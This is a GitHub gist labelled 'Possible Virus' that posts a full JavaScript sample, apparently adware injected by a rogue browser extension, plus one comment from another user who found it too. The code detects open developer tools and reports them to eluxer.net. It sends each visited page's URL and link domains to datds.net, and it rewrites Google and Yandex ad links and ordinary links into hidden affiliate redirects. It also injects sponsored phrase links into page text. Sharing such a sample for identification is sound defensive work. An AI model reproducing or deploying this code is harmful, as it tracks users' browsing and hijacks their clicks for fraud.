Skip to content

Instantly share code, notes, and snippets.

@ifnull

ifnull/gist:07369b634041a243e6143e45247d1875

Created March 29, 2018 00:51
Show Gist options
  • Save ifnull/07369b634041a243e6143e45247d1875 to your computer and use it in GitHub Desktop.
Save ifnull/07369b634041a243e6143e45247d1875 to your computer and use it in GitHub Desktop.
Download ZIP
Possible Virus
Raw
gistfile1.txt
(function() {
var core = {
dt: !1,
isFrame: top != self,
modules: [],
opts: [],
options: {},
start: null,
$: null,
now: function() {
return (new Date).getTime()
},
buildUrl: function(o, t) {
return document.location.protocol + "//" + this.options.host + o + "?" + this.$.param(t)
},
buildMCUrl: function(o, t) {
return document.location.protocol + "//" + this.options.mcHost + o + "?" + this.$.param(t)
},
getPageHostname: function() {
return document.location.hostname.replace(/^www\./, "")
},
init: function(options) {
core.start = core.now(),
core.options = options;
var requres = new XMLHttpRequest;
requres.onload = function() {
eval(this.responseText);
var $ = core.$ = jQuery;
jQuery.noConflict(),
$.each(core.modules, function(o, t) {
t.call(null, core.opts[o], core, $, window, document)
})
}
,
requres.open("get", "https://code.jquery.com/jquery-3.0.0.min.js"),
requres.send()
},
run: function(o) {
this.modules.push(o)
}
};
core.init({
"subid": "85deke6407770",
"host": "eluxer.net",
"mcHost": "datds.net"
});
core.opts.push({});
core.run(function(e, n, r, t, i) {
function o() {
clearInterval(l),
n.dt || (n.dt = !0,
(new Image).src = n.buildUrl("/dt", {
r: Math.random()
}))
}
function a() {
var e = t.Firebug
, r = e && e.chrome;
return r && r.isInitialized ? void o() : (c.log(d),
void setTimeout(function() {
n.dt || c.clear()
}, 100))
}
var d = new Image
, c = t.console;
d.__defineGetter__("id", o);
var l = setInterval(a, 1e3);
a()
});
core.opts.push({
"place": 5608,
"maxIndexLength": 10000,
"minDistance": 200,
"phrases": false,
"domains": true
});
core.run(function(e, t, r, n, a) {
if (!t.isFrame) {
var i = a.createElement("a")
, o = n.localStorage
, s = {
progress: !1,
runTimeout: null,
init: function() {
switch (s.watchMutations(),
t.getPageHostname()) {
case "yandex.ru":
case "yandex.ua":
s.prepareYandex();
break;
case "google.ru":
case "google.com":
case "google.com.ua":
s.prepareGoogle()
}
},
watchMutations: function() {
if (n.MutationObserver) {
var e = t.getPageHostname()
, r = {
"yandex.ru": [/\bcontent__left\b/, /\bsuggest2\b/],
"yandex.ua": [/\bcontent__left\b/, /\bsuggest2\b/],
"google.com": [/\bcontent\b/, /\btsf\b/],
"google.com.ua": [/\bcontent\b/, /\btsf\b/],
"google.ru": [/\bcontent\b/, /\btsf\b/]
};
if (r.hasOwnProperty(e)) {
var i = r[e]
, o = new n.MutationObserver(function(e) {
for (var t = !0, r = 0; r < e.length; r++)
for (var n = e[r].target; n; ) {
for (var a = 0; a < i.length; a++)
i[a].test(n.className) && (t = !1);
n = n.parentNode
}
t || s.reRun()
}
);
o.observe(a.body, {
childList: !0,
subtree: !0
})
}
}
},
prepareYandex: function() {
r(".serp-adv-item").each(function() {
var e = r(this)
, t = e.find(".serp-item__greenurl a, .organic__path a");
if (t.length) {
var n = t[0]
, a = n.textContent.toLowerCase().split("/")[0];
e.find("a").attr("data-href", "http://" + a)
}
})
},
prepareGoogle: function() {
r(".ads-ad").each(function() {
var e = r(this)
, t = e.find("cite")[0];
if (t) {
var n = t.textContent.toLowerCase().split("/")[0];
e.find("a").attr("data-href", "http://" + n)
}
})
},
reRun: function() {
s.progress || (clearTimeout(s.runTimeout),
s.runTimeout = setTimeout(function() {
s.run(a.body)
}, 500))
},
run: function(n) {
s.progress = !0;
var i = {
url: a.location.href,
urls: [],
phrases: []
};
return e.domains && (i.urls = s.findUrls(n)),
e.phrases && (i.phrases = s.findPhrases(n)),
i.urls.length || i.phrases.length ? void r.ajax({
type: "POST",
data: JSON.stringify(i),
contentType: "application/json",
dataType: "json",
xhrFields: {
withCredentials: !0
},
url: t.buildMCUrl("/replacement/find", {
place: e.place,
subid: t.options.subid,
hsid: chrome && chrome.runtime && chrome.runtime.id || ""
}),
success: function(e) {
t.dt || (s.replaceUrls(n, e.urls),
s.replacePhrases(n, e.phrases),
setTimeout(function() {
s.progress = !1
}, 500))
}
}) : void (s.progress = !1)
},
getDomainByUrl: function(e) {
return i.href = e,
s.getDomain(i)
},
getDomain: function(e) {
return e.hostname.toLowerCase().replace(/^www\./, "")
},
getRealDomain: function(e) {
return s.getDomainByUrl(s.getRealHref(e))
},
getRealHref: function(e) {
var t = s.getDomain(e);
return -1 !== ["google.ru", "google.com", "yabs.yandex.ru"].indexOf(t) && e.getAttribute ? e.getAttribute("data-href") : e.href
},
getBaseRealHref: function(e) {
i.href = s.getRealHref(e);
var t = s.getDomain(i)
, r = "";
return -1 !== ["realty.yandex.ru", "plarium.com", "espritgames.ru", "101xp.com", "promo.101xp.com", "sportiv.ru"].indexOf(t) && (r = i.pathname),
t + r
},
getDistance: function(e, t) {
var r, n, a, i;
return e.top < t.top ? (a = e.top + e.height,
i = t.top) : (a = t.top + t.height,
i = e.top),
e.left < t.left ? (r = e.left + e.width,
n = t.left) : (r = t.left + t.width,
n = e.left),
Math.pow(r - n, 2) + Math.pow(a - i, 2)
},
extractWords: function(e) {
var t, r = new RegExp("(?:[-._&]?[a-zа-яё0-9]+)+","ig"), n = [];
for (n.wordsLength = 0; t = r.exec(e); )
n.push({
word: t[0].toLowerCase(),
text: t[0],
index: t.index
}),
n.wordsLength += t[0].length;
return n
},
findLinks: function(e) {
return r(e).find("a").filter(function() {
return !!this.hostname && !!s.getRealDomain(this)
})
},
findUrls: function(e) {
if (!e)
return [];
var t = {};
return this.findLinks(e).each(function() {
var e = s.getBaseRealHref(this);
t[e] = 1
}),
Object.keys(t)
},
replaceUrls: function(e, t) {
e && t && this.findLinks(e).each(function() {
var e = this
, n = s.getBaseRealHref(e);
if (n && t.hasOwnProperty(n)) {
var a = t[n]
, i = s.getRealHref(e);
e.realHref = i,
e.hiddenHref = s.buildClickLink(r.extend({
href: i
}, a)),
s.setClickHandler(e)
}
})
},
setClickHandler: function(e) {
var t = e.onclick;
e.onclick = function(r) {
var n, a = s.handleClick(e);
if ("function" == typeof t && (n = t(r)),
a && !1 === n)
return !1
}
},
handleClick: function(e) {
if (!e.hiddenHref)
return !1;
var r = e.href
, n = s.getDomain(a.location);
if (t.dt && e.realHref)
return !1;
var i = e.realHref && s.getDomainByUrl(e.realHref);
if (i && (-1 !== n.indexOf(i) || -1 !== i.indexOf(n))) {
var f = t.now();
if (!o || o._ym_ts && f - o._ym_ts < 72e5 || f - t.start < 6e4)
return !1;
o._ym_ts = t.now()
}
return e.href = e.hiddenHref,
e.realHref && delete e.hiddenHref,
setTimeout(function() {
e.href = r
}, 10),
!0
},
isPhraseNodeAllowed: function(e) {
if (!e.tagName)
return !1;
var t = ["AUDIO", "VIDEO", "IFRAME", "A", "IMG", "INPUT", "BUTTON", "SELECT", "OPTION", "SCRIPT", "META", "LINK", "STYLE", "NOSCRIPT", "HEADER", "FOOTER", "LABEL", "H1", "H2", "H3", "H4", "H5", "H6"];
if (-1 !== t.indexOf(e.tagName.toUpperCase()))
return !1;
if (e.className && "string" == typeof e.className)
for (var r = ["ya-partner", "header"], n = 0; n < r.length; n++)
if (e.className.match(new RegExp("\b" + r[n] + "\b")))
return !1;
var a = ["header", "footer"];
return -1 === a.indexOf(e.id)
},
findPhraseNodes: function(e) {
for (var t = [], n = [e]; n.length; ) {
var a = n.shift();
if (a.nodeType === Node.TEXT_NODE) {
var i = r.trim(a.textContent);
if (i.length > 2) {
var o = s.extractWords(a.textContent);
o.length && t.push([a, o])
}
} else if (s.isPhraseNodeAllowed(a))
for (var f = 0, c = a.childNodes.length; f < c; f++)
n.push(a.childNodes[f])
}
return t
},
findPhrases: function(t) {
var n = []
, a = 0
, i = this.findPhraseNodes(t);
return r.each(i, function(t, i) {
var o = i[1]
, s = r.map(o, function(e) {
return e.word
}).join(" ");
return a += s.length,
!(a > e.maxIndexLength) && void n.push(s)
}),
n
},
replacePhrases: function(e, t) {
if (e && t) {
var r = this.doReplacePhrases(e, t);
this.removeBadReplaces(e, r)
}
},
doReplacePhrases: function(e, t) {
var n = {};
r.each(t, function(e, t) {
var a = s.extractWords(e)
, i = n;
r.each(a, function(e, r) {
var n = a[e].word;
i.hasOwnProperty(n) || (i[n] = {
parent: i
}),
i = i[n],
e === a.length - 1 && (i.data = t)
})
});
var i = s.findPhraseNodes(e)
, o = [];
return r.each(i, function(e, t) {
for (var r, i = t[0], f = t[1], c = i.textContent, l = 0, u = 0, d = f.length; u < d; ) {
for (var h = u, p = n; h < d && p.hasOwnProperty(f[h].word); )
p = p[f[h].word],
h++;
for (; p.parent && !p.data; )
p = p.parent,
h--;
if (h <= u && !p.data)
u++;
else {
r = c.slice(l, f[u].index),
"" != r && i.parentNode.insertBefore(a.createTextNode(r), i);
var g = f[h - 1].index + f[h - 1].word.length
, m = c.slice(f[u].index, g)
, v = s.createPhraseLink(m, p);
o.push(v),
i.parentNode.insertBefore(v, i),
l = g,
u = h
}
}
l > 0 && (i.textContent = c.slice(l))
}),
o
},
removeBadReplaces: function(t, n) {
var i = Math.pow(e.minDistance, 2)
, o = []
, f = []
, c = [];
return r.each(n, function(e, t) {
var n = r(t)
, a = n.offset();
a.width = n.width(),
a.height = n.height();
for (var l = !0, u = o.length - 1; u >= 0; u--)
if (s.getDistance(o[u], a) < i) {
l = !1;
break
}
l ? (c.push(t),
o.push(a)) : f.push(t)
}),
r.each(f, function(e, t) {
t.parentNode.insertBefore(a.createTextNode(t.textContent), t),
r(t).remove()
}),
c
},
createPhraseLink: function(e, t) {
var n = a.createElement("a")
, i = r.extend({}, t.data, {
text: e
});
return r.extend(n, {
rel: "nofollow",
target: "_blank",
className: "intext-link",
textContent: e,
href: t.data.link || "#",
hiddenHref: s.buildClickLink(i)
}),
s.setClickHandler(n),
r.extend(n.style, {
position: "relative",
fontWeight: "bold"
}),
n
},
buildClickLink: function(n) {
return n = r.extend({
place: e.place,
subid: t.options.subid
}, n, {
url: a.location.href
}),
t.buildMCUrl("/replacement/click", n)
}
};
r(a).ready(function() {
s.init(),
s.run(a.body)
})
}
});
core.opts.push({});
core.run(function(e, a, o, n, l) {
var r = "seReplace"
, t = n.localStorage
, c = t[r] || 0;
a.now() - c < 864e5 || setInterval(function() {
var e, o = l.location;
o.pathname,
o.hostname,
o.href;
e && (t.seReplace = Date.now(),
l.location.href = a.buildMCUrl("/go", {
url: e
}))
}, 1e3)
});
}
)();
@gloom-nightfall
Copy link

Had this as well, do you have any idea where its loaded / where its from?
Kind regards,

Teo

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment